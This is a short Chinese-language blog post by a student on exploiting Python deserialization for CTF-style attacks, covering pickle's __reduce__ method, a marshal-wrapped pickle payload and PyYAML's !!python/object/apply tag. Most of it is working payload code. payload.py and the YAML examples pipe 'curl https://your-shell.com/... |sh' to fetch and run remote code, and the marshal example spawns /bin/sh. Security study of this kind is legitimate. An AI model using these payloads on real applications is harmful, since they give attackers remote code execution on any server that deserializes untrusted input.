python反序列化

🎼个人主页：金灰

😎作者简介:一名简单的大一学生;易编橙·终身成长社群的嘉宾.✨

专注网络空间安全服务,期待与您的交流分享~

感谢您的点赞、关注、评论、收藏、是对我最大的认可和支持！❤️

🍊易编橙·终身成长社群🍊 : http://t.csdnimg.cn/iSLaP 期待您的加入~

免责声明:本文仅做分享~

目录

python反序列化

payload.py

特征:

Marshal 反序列化

marshal_serialize.py

PyYAML 反序列化

危险利用:

---

python反序列化

python反序列化:
序列化
类对象->字节流
--------------
反序列化
字节流->对象

python序列化常用的模板:
1 pickle
2 json


报错  'nt'  时
--自己的操作系统与服务器的操作系统不一样.  (用相同的操作系统操作)

---

payload.py

import pickle
import os
import base64
class ctf():
    def __init__(self):
        self.username=0
        self.password=0
    def login(self,username,password):
        return username=='admin' and password=='123456'
    def __reduce__(self):	# 返回一个元组,第一个成员是 回调函数 ; 第二个成员是 回调函数的参数.
        print('reduce')
        return os.system,('curl https://your-shell.com/IP:3389 |sh')
c=ctf()
# 生成字节流
serialize = pickle.dumps(c)
payload = base64.b64encode(serialize)
print(payload)

# 只要有reduce方法,反序列化后,就可以执行命令...

---

特征:

不需要 恶意类.!
反序列化字符串里面包含类的所有定义，包括类的方法

php反序列化时，只能控制类的属性，利用现有的魔术方法做跳板 .
python反序列化时，直接可以不需要恶意类，也不需要现有的魔术方法，直接产生类的定义并执行__reduce__方法
# 返回一个元组,第一个成员是 回调函数 ; 第二个成员是 回调函数的参数.

---

Marshal 反序列化

pickle 类无法序列化  code类，为了弥补这个问题，2.6 以后增加了marshal模块来处理.

marshal_serialize.py

 

import base64
import pickle
import marshal

def foo():
    import os
    os.system('whoami;/bin/sh')     # evil code

shell = """ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'%s'
tRtRc__builtin__
globals
(tRS''
tR(tR.""" % base64.b64encode(marshal.dumps(foo.func_code))

print(pickle.loads(shell))

---

PyYAML 反序列化

过滤不严,

!!python/object 标签       -->类对象
!!python/object/new 标签   -->新建一个类
!!python/object/apply 标签 -->执行python代码

危险利用:

data=!!python/object/apply:os.system["curl xxx"]
data=!!python/object/apply:os.system ["curl https://your-shell.com/IP:3389 |sh"]

---